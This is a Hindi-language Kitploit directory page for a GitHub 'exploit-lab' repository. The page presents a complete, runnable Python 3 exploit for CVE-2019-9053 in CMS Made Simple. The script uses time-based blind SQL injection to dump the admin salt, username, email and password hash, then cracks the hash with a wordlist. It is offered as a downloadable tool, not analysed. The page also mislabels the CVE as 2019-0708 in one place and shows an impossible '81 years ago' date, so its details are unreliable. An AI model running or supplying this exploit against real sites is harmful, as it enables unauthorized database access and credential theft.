Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-exploit-lab — Python cve-2019-9053 का शोषण – HackHeart द्वारा | Kitploit
उपकरण/GitHubGitHub/hackheart-tech/-exploit-lab
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhackheart-tech/-exploit-lab

-exploit-lab

Python cve-2019-9053 का शोषण – HackHeart द्वारा

रिपॉजिटरी देखें
81 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

-exploit-lab

पायथन cve-2019-0708 शोषण – HackHeart द्वारा

🧠 कोड समीक्षा और पोर्टिंग - Python 2 → Python 3 यह शोषण मूल रूप से Python 2 में लिखा गया था, जो अब आधुनिक सिस्टम द्वारा समर्थित नहीं है। संगतता सुनिश्चित करने और भविष्य-प्रूफ टूलिंग बनाए रखने के लिए, पूरे कोडबेस की सावधानीपूर्वक समीक्षा की गई और इसे Python 3 में स्थानांतरित किया गया।

🔧 पोर्टिंग के दौरान मुख्य सुधार:

  • प्रिंट स्टेटमेंट को Python 3 सिंटैक्स में अपडेट किया गया
  • raw_input() को input() से बदला गया
  • सॉकेट ऑपरेशन को byte/str को उचित रूप से संभालने के लिए अनुकूलित किया गया (.decode() जोड़ा गया)
  • xrange() और .iteritems() जैसी पदावनत विधियों को हटाया गया
  • Python 3.8+ और आधुनिक Linux वितरणों के साथ स्क्रिप्ट संगतता को मान्य किया गया

🛡️ यह संस्करण शोषण तर्क को बरकरार रखता है जबकि निम्नलिखित सुनिश्चित करता है:

  • आधुनिक OSCP / Red Team लैब्स के साथ संगतता
  • स्वच्छ, सुरक्षित और अधिक पठनीय सिंटैक्स
  • आधुनिक वातावरणों (VS Code, Kali, Parrot OS…) में चलाने के लिए तैयार
root@kitploit:~
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection

import requests
import time
import argparse
import hashlib

parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")

args = parser.parse_args()

url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1

flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""

def dump_field(field_name, table, column, condition):
    global flag
    result = ""
    ord_result = ""
    while flag:
        flag = False
        for char in dictionary:
            temp_result = result + char
            ord_temp_result = ord_result + format(ord(char), "x")
            print(f"[*] Trying {temp_result}")
            payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
            start_time = time.time()
            session.get(url_vuln + "&m1_idlist=" + payload)
            if time.time() - start_time >= TIME:
                result = temp_result
                ord_result = ord_temp_result
                flag = True
                break
    return result

print("[+] Extracting salt...")
flag = True
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"

print("[+] Extracting username...")
flag = True
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"

print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"

print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"

if args.crack and args.wordlist:
    print("[+] Cracking password...")
    with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
        for line in f:
            word = line.strip()
            print(f"[*] Trying password: {word}")
            if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
                output += f"[+] Password cracked: {word}\n"
                break

print("\n=== Exploit Results ===")
print(output)
टूल डाउनलोड करें